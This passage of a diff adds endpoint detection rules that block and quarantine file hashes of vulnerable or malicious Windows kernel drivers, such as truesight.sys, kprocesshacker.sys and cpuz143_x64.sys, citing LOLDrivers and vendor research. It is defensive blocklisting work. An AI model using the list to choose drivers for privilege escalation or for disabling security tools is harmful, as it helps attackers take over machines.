"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605022Z", + "creation_date": "2026-03-23T11:45:29.605024Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605032Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62366c3a767c60984c67e58b8f57ca3ecce6eaa11006de8be318f074ecc350fd", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "715a3ee9-1d54-568f-b3a1-e697a3c7e889", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982677Z", + "creation_date": "2026-03-23T11:45:29.982679Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982685Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "27cd05527feb020084a4a76579c125458571da8843cdfc3733211760a11da970", + "comment": "Vulnerable Kernel Driver (aka AsrSetupDrv103.sys) 
[https://www.loldrivers.io/drivers/19003e00-d42d-4cbe-91f3-756451bdd7da/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "715d09d9-b01f-564b-8051-e0905c869279", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826461Z", + "creation_date": "2026-03-23T11:45:30.826463Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826468Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "57876e89166558bb3f3aafb64347881e5d1e153b7d3bdfac492596839062fcec", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "71650996-ed68-52c2-b62d-3a534585d291", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487702Z", + "creation_date": 
"2026-03-23T11:45:31.487703Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487709Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4b1186d61e569091aa1c1e37ab78ead35bc3d568e9ada3f4a3f806a995ab94c6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "717c8640-0b98-5998-b9f6-5c76aa1c5cda", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829041Z", + "creation_date": "2026-03-23T11:45:31.829043Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829051Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ccd3a7e948d34b5db6da27a98055e65e7c161f3c2e0a534fd114a0f080b84370", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "717cb000-9542-5749-876a-0c0a92b50f07", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604264Z", + "creation_date": "2026-03-23T11:45:29.604266Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604271Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb467e8c9edf1ac9ddabbc666cd48fc37b05e9d9390bb347504c899e15bce4d8", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "718256fb-b908-55df-a66e-52ba6e2e0552", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143808Z", + "creation_date": "2026-03-23T11:45:31.143810Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.143815Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f31fc480082ce2c9a5fde79fc84fda30869ed9a489d5a8984a4b8515f797cb11", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7194fbfa-9525-53f0-9a8f-6ed02003d6f0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985121Z", + "creation_date": "2026-03-23T11:45:29.985125Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985134Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d50ee14181cf60bbdffe1a891b9bb3a852c93019f1f05dde47b3178b821b8f54", + "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "719cac79-9f5b-5767-b078-6705eb5cfa10", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159553Z", + "creation_date": "2026-03-23T11:45:31.159555Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159560Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "80d2a78390a8036400f0e67b51da1642bff09088e3578d3debe80b70859da088", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "719e319d-d4a2-5348-b9fc-7b051fbf2a7b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146150Z", + "creation_date": "2026-03-23T11:45:31.146152Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146158Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"c2a21728cff35609180283bdcb4872290f3659187bdcf3ea4086fc11c68546d1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "71a110fe-9d7c-5f78-8ad8-47bcebb393f8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979636Z", + "creation_date": "2026-03-23T11:45:29.979637Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979643Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "28d3a5a85eef4561c4ad08fd83aca4f7a946f8dca8bfb7958a855a80197f68a6", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "71aadc78-b29a-58fb-b4eb-22af8f917010", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610759Z", + "creation_date": "2026-03-23T11:45:29.610761Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610767Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c3e150eb7e7292f70299d3054ed429156a4c32b1f7466a706a2b99249022979e", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "71ae193b-da8c-532b-94db-48a8e671a758", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977782Z", + "creation_date": "2026-03-23T11:45:29.977784Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977789Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0892c3facb931521bbe87b31d836d376b169198c2550baaf444df742e85d0846", + "comment": "Vulnerable Kernel Driver (aka NetProxyDriver.sys) [https://www.loldrivers.io/drivers/c1ece07b-e92a-4050-95ee-90e03aa82120/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "71b4ca0a-b181-53f2-9603-a9df87666c17", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140190Z", + "creation_date": "2026-03-23T11:45:31.140192Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140198Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29bf8f226cd4e048eef081546c4f0fd81ab77dbb54cc75e2c76effe93cb62919", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "71b6e02f-949f-52ab-9536-62bc69d03743", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618075Z", + "creation_date": "2026-03-23T11:45:29.618077Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618085Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "50aa2b3a762abb1306fa003c60de3c78e89ea5d29aab8a9c6479792d2be3c2d7", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "71b97a78-e69b-5abd-b3e0-c2c8555fc9a2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482727Z", + "creation_date": "2026-03-23T11:45:31.482731Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482741Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0acef0a19973a7853d09e83a32e745cd38d4dcb88564e7575d783c0c13cfd7f9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "71e13771-07d2-5a60-9097-94c939d8260c", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829863Z", + "creation_date": "2026-03-23T11:45:30.829865Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829887Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "20dbc1837e8b10bb35b582167918dd5818026c06a9b4187405925d42eea669ee", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "71e27892-3104-5e0a-ac6f-d98226e0277b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479732Z", + "creation_date": "2026-03-23T11:45:31.479736Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.479746Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "843990c940711a684d360087216592cddf51742c21a134e6fe309eb49032da53", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "71e5040a-f34d-5be9-960b-6cf164bce658", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155805Z", + "creation_date": "2026-03-23T11:45:31.155807Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155813Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0eb2b056075631ee5d4765beb21802a883ece09aa43e9475dd6435f0b7a5ebec", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "71f45c13-ecca-59be-9a27-644f05fe2555", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831074Z", + "creation_date": "2026-03-23T11:45:30.831076Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831081Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cdf0d7a896541d9711a4361edb602ca050d769fd5f0b0ef87a50a2962b616a6b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "720280d9-a0dc-5f08-ba71-22e1e076dffe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812081Z", + "creation_date": "2026-03-23T11:45:31.812083Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812088Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "575dab49b1edb95a6cb08375428806b262796e5b54517cda608844bc4021571e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "720318e1-5d38-5cf9-a79f-649efecec71f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616988Z", + "creation_date": "2026-03-23T11:45:29.616990Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616996Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ee914c20b3e4a321bcd2ea2f0f437cda6da09dc0819cd6f06960c0567f4cb19", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "72297edc-c90d-5e63-9075-095b98b7d967", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819226Z",
+ "creation_date": "2026-03-23T11:45:30.819228Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819233Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77aabfc119686757d31cc9d21af9bf3bacecaae09dc92e548355a145db0aa774",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "722abf29-350f-5aec-aae7-d637fbdf1a3d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619422Z",
+ "creation_date": "2026-03-23T11:45:29.619424Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619429Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "64d060216cf55210f595609487b708d5e70e0706a8de0827369bf58898205f34",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "722cf7bf-5fdc-5090-a8b2-94b6d6b2815e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982765Z",
+ "creation_date": "2026-03-23T11:45:29.982767Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982773Z",
+ "rule_level": null,
+ "rule_level_override": null,
